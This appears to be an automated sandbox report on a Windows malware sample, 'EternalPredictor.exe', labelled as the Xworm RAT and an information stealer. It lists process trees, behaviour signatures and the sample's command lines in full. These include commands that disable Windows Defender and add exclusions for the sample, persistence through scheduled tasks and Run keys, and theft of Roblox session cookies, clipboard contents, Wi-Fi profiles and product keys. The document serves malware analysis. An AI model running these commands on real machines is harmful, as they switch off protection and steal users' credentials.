PID 4544 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4376 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4376 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4576 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4576 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 4544 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\attrib.exe
PID 4544 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\attrib.exe
PID 4544 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 4544 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 2644 wrote to memory of 4440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2644 wrote to memory of 4440 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2160 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2160 wrote to memory of 404 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2972 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2972 wrote to memory of 4748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 4692 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4692 wrote to memory of 4452 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3424 wrote to memory of 4668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 3424 wrote to memory of 4668 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4796 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4796 wrote to memory of 1936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tree.com
PID 4128 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 4128 wrote to memory of 1336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\backgroundTaskHost.exe
PID 2668 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 3780 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

C:\Users\Admin\AppData\Roaming\eternal.exe

"C:\Users\Admin\AppData\Roaming\eternal.exe"

C:\Users\Admin\AppData\Roaming\skuld.exe

"C:\Users\Admin\AppData\Roaming\skuld.exe"

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\system32\attrib.exe

attrib +h +s C:\Users\Admin\AppData\Roaming\skuld.exe

C:\Users\Admin\AppData\Roaming\program.exe

"C:\Users\Admin\AppData\Roaming\program.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\program.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎    .scr'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\reg.exe

REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib -r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\attrib.exe

attrib +r C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s1nf3keq\s1nf3keq.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB65F.tmp" "c:\Users\Admin\AppData\Local\Temp\s1nf3keq\CSCACB1B33F42B34ED4BD7F3B32DB16E06.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\DicYJ.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI32882\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI32882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\DicYJ.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network


Files


Analysis: behavioral3

Detonation Overview

Submitted

2024-11-17 10:10

Reported

2024-11-17 10:13

Platform

win11-20241007-en

Max time kernel

124s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Xworm family

xworm

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\program.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A

Clipboard Data

collection
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\skuld.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\eternal.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 396 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 396 wrote to memory of 1432 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\eternal.exe
PID 396 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 396 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\skuld.exe
PID 4708 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 4708 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Roaming\skuld.exe C:\Windows\system32\attrib.exe
PID 396 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 396 wrote to memory of 3824 N/A C:\Users\Admin\AppData\Local\Temp\EternalPredictor.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3824 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 3824 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Users\Admin\AppData\Roaming\program.exe
PID 1432 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 1432 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Roaming\eternal.exe C:\Windows\System32\schtasks.exe
PID 3404 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 996 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 996 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\System32\Conhost.exe
PID 3404 wrote to memory of 3608 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\System32\Conhost.exe
PID 996 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 996 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3928 wrote to memory of 4700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3608 wrote to memory of 3488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3608 wrote to memory of 3488 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3404 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
PID 3404 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Roaming\program.exe C:\Windows\system32\cmd.exe
